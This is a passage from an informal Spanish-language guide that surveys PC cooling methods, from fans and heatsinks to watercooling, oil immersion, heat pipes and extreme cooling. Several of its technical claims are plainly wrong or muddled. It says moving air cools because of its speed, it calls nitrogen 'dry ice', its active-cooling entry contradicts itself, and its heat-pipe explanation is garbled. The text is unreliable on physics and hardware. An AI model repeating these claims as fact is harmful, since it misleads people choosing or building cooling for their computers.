problemas. Esto se debe, a que los microprocesadores, alcanzan muy altas temperaturas en uso, el cual, si no son
refrigerados correctamente, estos debilitaran su funcionamiento, y nosotros lo notaremos al querer trabajar en el S.O.
Es por esto, que siempre es interesante saber los métodos de enfriamiento que existen actualmente, como utilizarlos,
cuando usarlos, y como saber si nuestra PC, se encuentra con una buena refrigeración para prevenir posibles problemas de
lentitud debido al calor.
Refrigeración por Aire:
Creo que el 90 % del planeta sabe que una buena técnica de enfriamiento es por aire. Pero no muchos saben que usar un
cooler no es el único método, es por eso, que describiré los distintos tipos que hay.
Refrigeración por cooler (Ventilador): El método más viejo conocido sobre la tierra y uno de los más usados. El método
es muy simple. Consiste en llevar aire de temperatura ambiente a un lugar especifico que deseamos refrigerar
(generalmente de temperatura mas alta). En si, el método solo se basa por la física, ya que al realizar el envío de aire por
medio de la velocidad de un motor, este, el aire, deja de estar en reposo y toma la velocidad empleada sobre el, dando
como resultado, un descenso de temperatura del aire, el tan llamado aire fresco. Un simple pero efectivo método, aunque
no siempre es suficiente.
Refrigeración pasiva (Disipadores de calor): En que consiste esto, muy simple. Se utilizan materiales capases de disipar
el calor, como por ejemplo el aluminio o cobre, y mucho mejor aun, la plata. Su funcionamiento es muy ingenioso, ya que
toma de la superficie del microprocesador su alta temperatura, la reparte en el material disipable utilizado (mientras mas
grande mejor, ya que tendrá muchísimo mejor circulación).
Refrigeración activa (Acelerador de flujo de Aire): Es un método sumamente efectible, ya que utiliza el mismo método
que la activa, pero sumándole un acelerador de flujo, generalmente un cooler.
Su forma es muy variada, pero su método sigue siendo el mismo (mejor o no tanto). Seguimos constando de un disipador
de alguna aleación de metal capas de disipar bien el calor, con una forma especifica, que esto aria que al entrar el aire
fresco por el movimiento de las aletas del cooler, este, tomara aun mas velocidad, ocasionando una mejor refrigeración de
las partes, y enviando el aire cambiado lejos de los componentes generadores de calor.
Si bien su funcionamiento consta de un cooler, esto no quiere decir que será igual que silencioso que el método pasivo, es
por esto que a algunas personas no les interesa, ya que prefieren la tranquilidad antes que la calidad, cosa que no acepto.
También hay que tener en cuenta que su constectura es mayor, y es por eso, que se necesita un buen espacio para hacerlo
funcionar, pero mientras se lo tenga, siempre es sugerible tener este tipo de refrigeración en nuestro hardware.
Refrigeración por división: Este método es similar a la refrigeración pasiva, pero con un pequeño cambio, solo usaremos
una pequeña plancha del derivado de la unión entre Seleniuro de Antimonio y Telururo de bismuto como método de
separación entre el cooler y el hardware generador de calor, y un cooler como ayuda de enfriamiento. Podemos tomar el
mecanismo similar al de las juntas usadas en las partes de automóviles, solo con el cambio de que no lo usamos como
mecanismo de unión, sino de disipador. Esta variación de metales genera un incremento de baja temperatura, que con la
ayuda de una simple cooler, mejora aun mas, dando como resultado, una buena disipación del calor y modo de
enfriamiento.
Refrigeración Liquida:
Watercooling: Si bien es un método súper complejo de realizar, este quizás es uno de los más eficientes para PCs
hogareñas. El agua tiene la facultad de poder conducir calor dentro de ella, entonces, al hacer un sistema de bombeo que
envié agua a los componentes que deriven calor, esta tomara contacto, y retirara el calor que luego será disipado fuera del
sistema. Súper recomendable, siempre y cuando se tengan las precauciones necesarias para poder llevarlo a cabo. Todos
sabemos que el agua y la electricidad no son muy buenas compañías, es por esto que si llegáramos a provocar un filtrado
del líquido dentro de nuestro hardware, seria catastrófico (siempre hablando de gente sin experiencia). Siempre que se
tengan las prevenciones, este método seria muy bien recomendable para toda PC de casa.
Refrigeración por inmersión: Su método no es muy recomendable, pero no hay que decir que no es efectible. Seria algo
menos así, conseguir un acuario, y meter nuestro hardware dentro, y llenarlo con aceite mineral (este es capas de disipar
rápida y efectivamente el calor). Si bien no esta diseñado para cualquier persona, pero siempre es bueno saber que existe
un método que quizás se te ocurrió alguna vez preguntarte.
Refrigeración con metal líquido: Es similar al funcionamiento del Watercooling pero con el cambio de que usaremos
derivados de metales líquidos como componente disipador.
Refrigeración tipo Heatpipes: Este método muy poco usual, pero muy efectivo, esta basado principalmente en leyes de la
física. Explicando brevemente, diríamos que tenemos un recipiente con fluido, siempre a una temperatura estándar. Al
entrar en contacto con la superficie de temperatura elevada, el líquido conduce la temperatura elevada hacia la superficie
y hace que el más fresco baje. El aire nuevo de la superficie es llevado por un sistema de conductos hasta un disipador,
que lo que hace es retirar la temperatura y condensar nuevamente el fluido para ser reutilizado. Usualmente, son
acompañados por un sistema de cooler como ayuda en disipación, lo que los hace aun más eficientes.
Refrigeración con Hielo Seco: Quizás uno de los métodos altamente efectivos y más llamativos de toda esta guía. Su
método es recomendable, pero siempre hay desventajas. Explicando en principio como funciona, diríamos que
necesitamos Nitrógeno o también llamado Hielo Seco, como método de refrigeración. Este liquido, es capas de llegar a
temperaturas cercanas a los -200ºC, y al estar en contacto con la superficie de temperatura elevada, no tiene problemas en
lo absoluto. Usualmente se utiliza el método en campeonatos de Overclocking, siempre trabajando con prudencia.
Podríamos trabajar en nuestra PC con un sistema así, pero la desventaja seria que no podemos apagar nuestra PC, ya que
haríamos un cambio brusco de temperatura, ocasionando que el microprocesador o la superficie a refrigerar, sufra daños
graves.
FIN
Descargar